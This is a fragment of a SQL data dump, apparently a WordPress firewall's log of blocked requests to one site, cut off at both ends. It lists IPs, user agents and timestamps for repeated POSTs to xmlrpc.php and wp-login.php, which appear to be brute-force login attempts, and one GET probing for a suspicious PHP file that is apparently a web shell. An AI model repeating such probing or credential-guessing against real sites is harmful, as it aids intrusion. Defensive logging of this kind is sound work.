Firefox\\/96\"}','xguKtqvb2EHX6wkVP8CiMpD7',0,1664772466.5153,19265,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','CPNevIT4QnO3SDEyY7jltsGR',0,1664772794.7264,1969,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ViHXDm64MOIxNKryEL9jsBbz',0,1664773089.6463,18375,'','POST',403,0,515,0,1,'',0),('188.132.174.112',3162812016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pJNY2K9dRbxSXvfCgH6OwW8I',0,1664774124.5093,17586,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YkymgKqoVHPIzsOeFJ1DMpBv',0,1664774130.1467,12048,'','POST',403,0,515,0,1,'',0),('3.34.104.242',52586738,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YUDZfTqxd8pH7ACPIe09chmB',0,1664774450.2816,9478,'','POST',403,0,515,0,1,'',0),('103.171.180.165',1739306149,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JKgY2Bf05XOMGp4HVRTsAcCj',0,1664774478.8572,731,'','POST',403,0,515,0,1,'',0),('209.141.37.194',3515688386,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Trident\\/7.0; rv:11.0) like Gecko\"}','EUJkDI1CveOG7TdpfBoNnSzx',0,1664774744.6992,2483,'','POST',403,0,600,0,1,'',0),('152.32.211.172',2552288172,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qsHylXTeB0zvUmNifJF6xpGK',0,1664774812.9124,18598,'','POST',403,0,515,0,1,'',0),('158.69.26.40',2655328808,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gh8P3oSs4E5H7nCXUVj0zqBR',0,1664775156.9910,1714,'','POST',403,0,515,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','voymKb2zAtNVPLrskap6BT1c',0,1664775158.0250,1192,'','POST',403,0,515,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7jfqdm0ZBetMwLPHNEyc9ou2',0,1664775481.3153,11916,'','POST',403,0,515,0,1,'',0),('103.110.84.132',1735283844,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fDgbNzOmQlrISk0j4oZC3RL6',0,1664775504.1368,1211,'','POST',403,0,515,0,1,'',0),('128.199.205.115',2160577907,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rL9f4b7dshQxv2SPCa3FgByi',0,1664775847.4481,5767,'','POST',403,0,515,0,1,'',0),('104.131.189.63',1753464127,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','epaciUqZutsWhPGv5JwFLnjm',0,1664776189.3043,19559,'','POST',403,0,515,0,1,'',0),('188.132.174.112',3162812016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZsbzIPLtGl8T0mS4hB7Y1cgM',0,1664776214.9683,568,'','POST',403,0,515,0,1,'',0),('150.95.112.79',2522837071,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','A8cNCY10OhPT9dsi3tpImJu7',0,1664776541.5374,18579,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PSt4eFGKAUmcHZzd6IogusYl',0,1664776566.4734,594,'','POST',403,0,515,0,1,'',0),('217.69.15.37',3645181733,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','2dR3VLHiwoljGkSse7qxINDQ',0,1664778277.4071,649,'','POST',403,0,515,0,1,'',0),('5.101.157.25',90545433,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kWMzb24gjX5DKAecxqIhiQ0l',0,1664778408.5162,18331,'','POST',403,0,515,0,1,'',0),('198.136.54.132',3330815620,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aM6kp0dgEtOqIBPA3HnUCVZj',0,1664778422.2766,4604,'','POST',403,0,515,0,1,'',0),('45.149.77.114',764759410,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZYJF9kLAUM1teglxhDEpVNBu',0,1664778789.8991,9993,'','POST',403,0,515,0,1,'',0),('131.153.50.250',2207855354,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','arSZkey7dhVzuLgW5GqY9JoC',0,1664778780.7063,19186,'','POST',403,0,515,0,1,'',0),('178.62.213.234',2990462442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','nbIs5koL3w2P4tXUYaVHAl0C',0,1664779034.2533,18657,'','POST',403,0,515,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','MveyAYHuq6TfVxiJw35hQrpd',0,1664779037.2557,15665,'','POST',403,0,515,0,1,'',0),('178.239.172.7',3002051591,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','OGhvR7Hg392r5LCoKJm6IsnE',0,1664779036.4243,16585,'','POST',403,0,515,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','jkd28cpirfbqtsHC96TKD5hW',0,1664779061.2714,1127,'','POST',403,0,515,0,1,'',0),('194.27.156.245',3256589557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','iK9S2AefysLtrGOJ4YRgjEd3',0,1664779061.9056,948,'','POST',403,0,515,0,1,'',0),('216.250.116.85',3640292437,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','182rNj3iFUO7RuVX5YTs9Mdc',0,1664779156.9552,16704,'','POST',403,0,515,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rxXHRBUhD2jmWCkbTuM9VnL3',0,1664779155.9053,17802,'','POST',403,0,515,0,1,'',0),('64.64.237.75',1077996875,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dMw0S54UpfNBV3cPmbxrTY6g',0,1664779233.0141,1806,'','POST',403,0,515,0,1,'',0),('159.223.119.187',2682222523,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','QzryjsuG3CtOTVnhJXLpcDZN',0,1664779232.1217,3499,'','POST',403,0,515,0,1,'',0),('157.7.190.241',2634530545,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','GBVxP30zJtC1gHnLeFyrWkcI',0,1664779242.0329,522,'','POST',403,0,515,0,1,'',0),('51.68.11.239',860097519,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','q60FjwrKAnuzotHUVsTSg5ZE',0,1664779243.8285,600,'','POST',403,0,515,0,1,'',0),('52.172.40.95',883697759,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','hVP2r0ZpXOeAqQn931bYMfKm',0,1664779247.5144,1358,'','POST',403,0,515,0,1,'',0),('78.47.46.81',1311714897,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','R3ONlg5d7GaWT9Yq6oxswXKA',0,1664779249.6168,717,'','POST',403,0,515,0,1,'',0),('137.184.193.51',2310586675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','N4te0B5v1rgcYyzmCEjVbSiG',0,1664779250.5258,548,'','POST',403,0,515,0,1,'',0),('65.52.67.200',1093944264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','1wIbCHYT9EZnGkmlOAVXcgaB',0,1664779254.0139,514,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ivjzL3GwaqXcMl2AP6HZIKpO',0,1664779269.3663,880,'','POST',403,0,515,0,1,'',0),('89.184.155.89',1505270617,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','IODc1qvMXsQ4bHZh3GFoN08A',0,1664779272.7202,554,'','POST',403,0,515,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','SpXCfleyVmiFx9HRNO3h4jq6',0,1664779517.3869,18512,'','POST',403,0,515,0,1,'',0),('184.168.121.5',3098048773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BSUkPT0ErY2Azw4unh6QNf7K',0,1664779540.1933,527,'','POST',403,0,515,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','D1RZStEyaG2hKY6NdfAW3cCn',0,1664779950.9523,18433,'','POST',403,0,515,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s2KqW4xY8yNVB7RvHElMmwTu',0,1664780282.8268,18348,'','POST',403,0,515,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TVPqAJU3Nsf7rwblpCnKWd1D',0,1664780310.2081,642,'','POST',403,0,515,0,1,'',0),('154.38.163.180',2586223540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','dyF1bNH7BTrfpuzDZSAhn2Rv',0,1664782237.0577,19265,'','POST',403,0,515,0,1,'',0),('195.225.76.130',3286322306,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','diqOwutKhIpAyGrXJ6YRjnQU',0,1664782266.4931,503,'','POST',403,0,515,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DeoEan8NZCcb5pzWfO4wRgiL',0,1664782640.1191,13135,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0ivCbs4jN2TApJqWDflXead3',0,1664783030.9760,11697,'','POST',403,0,515,0,1,'',0),('162.215.217.77',2732054861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','bJiVsW9KoHnQpU2ILaqtcO6B',0,1664783047.7452,569,'','POST',403,0,515,0,1,'',0),('216.158.230.167',3634292391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','txJ6LlIiE9CG7OhA1YD8qgUZ',0,1664783421.8696,2287,'','POST',403,0,515,0,1,'',0),('194.163.156.168',3265502376,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2z0ogLZOFxAThwJ9Mc4vPIt1',0,1664783444.5871,481,'','POST',403,0,515,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Bb8LEgPzVYSGDc3sMlwn6Z54',0,1664783804.4699,10330,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F5ofkTjlwsSxtN28GJ74WaMd',0,1664783814.9156,496,'','POST',403,0,515,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9wli1v0GupxWSNCOYP3sQJ6U',0,1664784613.1572,12802,'','POST',403,0,515,0,1,'',0),('46.229.214.93',786814557,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Jy51QXeVx9nbqd3YROTzNKvu',0,1664784607.1983,18889,'','POST',403,0,515,0,1,'',0),('213.165.237.48',3584421168,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Pq4mcFIXpsvHZYTQyGLt0f7w',0,1664785428.4180,14377,'','POST',403,0,515,0,1,'',0),('103.145.51.200',1737569224,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vzCuto5GZghBYf31iIxEnNmW',0,1664785432.5387,10918,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','VqxH5Idi18rFlLNycsj67AJ3',0,1664786206.4356,19477,'','POST',403,0,515,0,1,'',0),('5.101.157.191',90545599,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','j01fFToMUx9WmLH8tNRKcipw',0,1664786244.6780,1750,'','POST',403,0,515,0,1,'',0),('144.91.117.122',2421912954,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','564shUotZwijuTf1SELQCpOr',0,1664786619.8090,1370,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xELYdHecS8iPUqNnkawFsjDl',0,1664787031.0909,10546,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','UPvjCT4G8aRA5LkteEzfmuy9',0,1664787058.7774,1357,'','POST',403,0,515,0,1,'',0),('51.142.136.99',864979043,'','http://cteisys.com/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7XA8hey1m9PkCRdJbUjcSupa',0,1664787803.4714,12080,'','GET',403,0,700,0,1,'',0),('80.74.145.155',1347064219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','0xVO18rdgUQB6EKy5WwptCmY',0,1664788259.4021,5879,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','2k5eIPAfZ8ndRM3hC01mvF4t',0,1664788257.6492,7632,'','POST',403,0,515,0,1,'',0),('158.69.26.40',2655328808,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KyTb1qZa9RcOwlX2Skm50Whs',0,1664788267.9604,567,'','POST',403,0,515,0,1,'',0),('35.239.6.182',602867382,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','5OsuxjGDIZASyMo4cF1mzQhX',0,1664788272.1299,588,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','nd7DUkNsLoGBgErw5p9ySxmJ',0,1664788276.1946,595,'','POST',403,0,515,0,1,'',0),('217.21.95.107',3642056555,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','1yPUXvdWRuAfCegMB7iVGb9K',0,1664788277.3169,563,'','POST',403,0,515,0,1,'',0),('149.129.181.108',2508305772,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hoxpr49JeinkdjZcP1zquU6W',0,1664788286.7530,975,'','POST',403,0,515,0,1,'',0),('149.28.155.211',2501680083,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','CY8Tt3chqjKvBiAURGHskLl2',0,1664788287.3962,765,'','POST',403,0,515,0,1,'',0),('133.18.25.1',2232555777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','5OQqeGk78xspU4nT0DLmyYRJ',0,1664788305.4771,1421,'','POST',403,0,515,0,1,'',0),('91.189.176.172',1539158188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','A6237kNCMwadLU9bOxD4zWQj',0,1664788310.2117,529,'','POST',403,0,515,0,1,'',0),('59.106.13.177',996806065,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','f3Fd8T0s4HJxnc7XPWgyrjCu',0,1664788314.8568,547,'','POST',403,0,515,0,1,'',0),('184.168.125.241',3098050033,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9pOV2iJUy5h4ldS60TvzrsRM',0,1664789073.3102,19414,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sVIUgOYWM648NT2xDy7odGuE',0,1664789114.8419,794,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ScC6xkelgYsO2Ipq0DWtrand',0,1664789508.8709,18806,'','POST',403,0,515,0,1,'',0),('159.203.31.171',2680889259,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','67FQJwIVZSg2U5fndiCr8HOt',0,1664789533.5760,520,'','POST',403,0,515,0,1,'',0),('41.93.82.7',693981703,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Kz7ueYgBtbdxpZ28wLSWV4jM',0,1664789920.0097,3318,'','POST',403,0,515,0,1,'',0),('217.174.248.107',3652122731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','S1zqHOsMfbdPZV4nL0AwuGiT',0,1664790362.1976,2881,'','POST',403,0,515,0,1,'',0),('173.212.197.26',2916402458,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0caSBJk2Yv9hKCZEAszm4LFQ',0,1664790774.8540,18882,'','POST',403,0,515,0,1,'',0),('120.24.52.65',2014852161,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6eWwmgICYNZiy2h0Pt3M58bk',0,1664790780.0950,13640,'','POST',403,0,515,0,1,'',0),('187.32.188.214',3139484886,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','mqG3il2pzADeXUs1nhKdfSc8',0,1664791616.8544,18638,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','QuIJkWMX8Up2DLcj5nNwdCPY',0,1664792067.7774,18638,'','POST',403,0,515,0,1,'',0),('87.236.20.180',1475089588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RObNLW5r21xg9En8KPqzBhld',0,1664792494.6442,18764,'','POST',403,0,515,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KmUIjQsA4u0xLJCpDn3vqSFf',0,1664792515.5166,532,'','POST',403,0,515,0,1,'',0),('115.165.166.192',1940235968,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','wDXVL4vQt5h9GnCrlMbSo2dU',0,1664792628.0982,13700,'','POST',403,0,515,0,1,'',0),('185.2.6.13',3103917581,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','MwUXZzos7RCDQ5KjSnP61EHe',0,1664792624.0653,17738,'','POST',403,0,515,0,1,'',0),('45.79.47.25',760164121,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','BwscXKprNYeufEZbnxVDhz9S',0,1664792627.7426,14176,'','POST',403,0,515,0,1,'',0),('82.156.16.146',1385959570,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','nRUm7YrcCq10BVpuDifs2T3o',0,1664792653.5424,512,'','POST',403,0,515,0,1,'',0),('119.18.52.177',1997681841,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 